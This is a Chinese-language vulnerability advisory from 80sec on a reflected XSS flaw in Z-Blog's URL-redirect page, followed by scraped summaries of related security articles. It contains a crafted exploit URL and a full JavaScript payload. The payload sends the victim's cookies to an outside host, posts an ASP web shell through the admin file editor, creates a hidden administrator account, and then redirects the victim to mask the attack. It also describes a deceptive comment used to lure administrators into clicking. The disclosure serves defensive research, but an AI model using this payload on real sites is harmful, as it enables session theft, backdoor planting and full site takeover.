漏洞说明:Z-Blog是一款基于Asp平台的Blog博客(网志)程序,支持 Wap,支持Firefox,Oprea等浏览器,在国内使用非常广泛,官方主页在http://www.rainbowsoft.org/。Z- blog代码严谨,前台功能简洁,后台功能强大,这为它的产品安全带来很大的优势,但是80sec在产品中发现一个严重的跨站脚本攻击漏洞,加上产品设计上的一些问题可能带来严重的后果。
漏洞厂商:http://www.rainbowsoft.org/
漏洞解析:在FUNCTION/c_urlredirect.asp中,程序对提交的url参数做如下处理
strUrl=URLDecodeForAntiSpam(Request.QueryString("url"))
其中URLDecodeForAntiSpam是防止垃圾连接的解码函数,其函数处理如下
Function URLDecodeForAntiSpam(strUrl)
Dim i,s
For i =1 To Len(strUrl) Step 2
s=s & Mid(strUrl,i,1)
Next
URLDecodeForAntiSpam=s
End Function
在做如上处理之后程序将在c_urlredirect.asp输出url参数
...
<meta http-equiv="refresh" content="0;URL=<%Response.Write strUrl%>“/>
…
精心构造url参数将能构造一个url类型的非持久xss如下:
http://127.0.0.1/Z-Blog18/FUNCTION/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1×2x7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex
上述url访问之后将引入127.0.0.1/1.js执行,其中可以写任意js代码。
而z-blog的所有安全设计全部用来抵御前台的攻击,对于后台基本没有任何限制,加上antispam功能对用户提交的url连接类似于加密处理,所以很容易就可以诱惑别人访问上述的xss攻击url,可以发表评论如下:
看这个站,有新东西?
http://www.80sec.com
用户看到的是http://www.80sec.com这个信任的站点,而一旦点击将在www.foo.com域执行恶意用户指定的js,在该js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向,整个过程很难发现攻击的意图,80sec提供js如下:
xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexOf('password')==-1?0:1;
tolocation='http://www.80sec.com/';
//get cookie
x=new Image();
x.src="http://www.80sec.com/c.php?c="+escape(document.cookie);
//get a shell
data="txaContent=<%25execute(request(%22a%22))%25>“;
postmydata(”http://www.0×37.com/cmd.asp?act=SiteFilePst&path=%2E%2FUPLOAD%2Findex%2Easp&opath=”,data);
//add a user data=”edtID=0&edtLevel=2&edtName=xss2root&edtPassWord=d073d5454ffe92bdcd3cbcb77d149df5&edtPassWordRe=xss2root&edtEmail=null@null.com&edtHomePage=&edtAlias=”;
postmydata(”http://www.0×37.com/cmd.asp?act=UserCrt”,data);
//fool the user
window.location=tolocation;
function poster(){
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType(’text/xml’);
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
return request;
}
function postmydata(action,data){
xmlhttp.open("POST", action, false);
xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlhttp.send(data);
return xmlhttp.responseText;
}
漏洞状态:已经联系官方,请等待官方公告。
本站内容均为原创,转载请务必保留署名与链接!
Z-blog跨站脚本攻击漏洞:http://www.80sec.com/zbog-xss.html
分享到:
相关推荐
xss 跨站脚本攻击是一种常见的 web 应用程序漏洞,攻击者可以inject 恶意脚本到网页中,从而获取用户的敏感信息或控制用户的浏览器行为。下面是 xss 跨站脚本攻击的一些常见类型: 1. 普通的 XSS JavaScript 注入:...
Z-Blog PHP是一款基于PHP语言开发的开源博客系统,它为个人或团队提供了一个功能强大、易于使用的在线出版平台。这个压缩包“基于PHP的Z-Blog PHP博客程序.zip”包含了一个完整的Z-Blog PHP安装包,允许用户快速搭建...
跨站脚本(Cross-Site Scripting,简称XSS)是一种常见的网站安全漏洞,攻击者通过注入恶意脚本代码到信任的网页上,当用户浏览该网页时,嵌入其中的恶意脚本会被执行,进而窃取用户的敏感数据或进行其他非法操作。...
作为一款成熟的博客系统,Z-Blog v1.8 Walle Build 100427 在安全性方面做了不少工作,包括对输入数据的过滤、防止SQL注入、XSS攻击等。同时,定期的更新和补丁修复了已知的安全漏洞,确保用户的博客安全。 **7. ...
其次,跨站脚本攻击(XSS)通常涉及将恶意脚本注入到网页中,当用户访问时,脚本会在用户的浏览器上执行。这可能导致钓鱼、会话劫持或者信息盗窃。Netsparker对此类攻击的检测也非常到位,它可以识别并防止不安全的...
XSS(Cross Site Scripting),即跨站脚本攻击,是一种常见的网络安全漏洞,它允许攻击者将恶意脚本注入到看似可信的网站上。当用户浏览这些被注入恶意脚本的网页时,恶意脚本会在用户的浏览器环境中执行,从而导致...
【PHP应用安全】客户端脚本注入漏洞是Web应用程序常见的安全问题之一,主要发生在用户可以通过输入字段传递可执行脚本到服务器端,导致恶意脚本在客户端执行,影响用户体验,甚至可能导致敏感信息泄露或被篡改。...
XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器中注入恶意脚本,从而控制用户的交互行为或者窃取敏感信息。这个"Xsser.7z漏洞练习靶场"提供了一个平台,帮助安全...
3. **源代码审查**:如何通过阅读和分析源代码来发现潜在的安全漏洞,如SQL注入、跨站脚本(XSS)攻击等,并提供修复建议。 4. **网络犯罪的法律后果**:强调从事或协助信用卡欺诈的法律责任,提醒用户和开发者都应...
- 跨站脚本(XSS):攻击者通过在网页中插入恶意脚本,使用户浏览器执行。 - 跨站请求伪造(CSRF):攻击者利用用户的已登录状态,诱使用户进行非预期的操作。 - 文件包含漏洞:允许攻击者将外部文件内容包含到应用...
- **描述**:FCKeditor允许用户上传文件到服务器,如果文件上传功能未被正确保护,攻击者可以上传恶意脚本文件。 - **子类型** - **4.1**:通过上传单一恶意文件实现攻击(如`shell.php`),适用于Windows和*nix...
标题中的"CNVD-2020-10487.7z"是指中国国家信息安全漏洞库(China National Vulnerability Database,简称CNVD)在2020年记录的一个编号为CNVD-2020-10487的安全漏洞。这个漏洞主要涉及到Apache Tomcat服务器,而...
XSS(Cross Site Scripting)挑战,正如“xsschallenge.7z”这个压缩包所暗示的,是一种网络安全训练,旨在帮助用户理解并应对跨站脚本攻击。XSS攻击是Web应用中常见的一种安全威胁,它允许攻击者在用户的浏览器上...
4. 关闭JavaScript:在PDF阅读器设置中禁用JavaScript支持,可以降低被恶意脚本攻击的风险。 5. 检查数字签名:验证PDF文件的数字签名,确保文件未被篡改。 6. 使用在线PDF扫描工具:在打开未知文件前,可以通过...
7. **XSS** - 跨站脚本攻击的相关资料,可能包括示例、工具或防御策略。 8. **sqlmapproject-sqlmap-c1825b2** - SQLMap是一个流行的自动化SQL注入工具,用于检测和利用SQL注入漏洞。 9. **靶场源码** - 仿真Web应用...
2. **漏洞分类**:书中可能涉及多种类型的漏洞,如缓冲区溢出、整数溢出、格式字符串漏洞、SQL注入、跨站脚本(XSS)、权限提升等。 3. **缓冲区溢出**:一种常见的漏洞类型,当程序尝试写入超出分配内存空间的数据...
这些脚本通常用于网络安全检测、漏洞利用和系统审计。 【描述】这个压缩包中的脚本集是渗透测试人员常用的工具,它们可以帮助用户发现并利用系统的安全弱点。Python因其易读性、强大的库支持以及在网络编程上的广泛...
3. **安全性考虑**:由于ASP程序可能面临SQL注入、跨站脚本攻击(XSS)等问题,Z管家1.5在设计时应该考虑了这些安全措施,比如输入验证、输出编码等。但是,免费程序的安全性可能不如专业商业软件,使用时需要定期更新...
ettercap是一款功能强大的网络嗅探和欺骗工具,它不仅可以捕获数据包,还可以进行中间人攻击(Man-in-the-Middle,MITM),这使得ettercap在网络安全测试和渗透测试中十分有用。 在【压缩包子文件的文件名称列表】...
2. **跨站脚本攻击(XSS)**:XSS允许攻击者在用户浏览器上执行恶意脚本,获取用户会话信息或执行其他有害操作。AWVS 14.7z可能强化了对输出编码的处理,避免XSS漏洞的产生。 3. **跨站请求伪造(CSRF)**:CSRF攻击...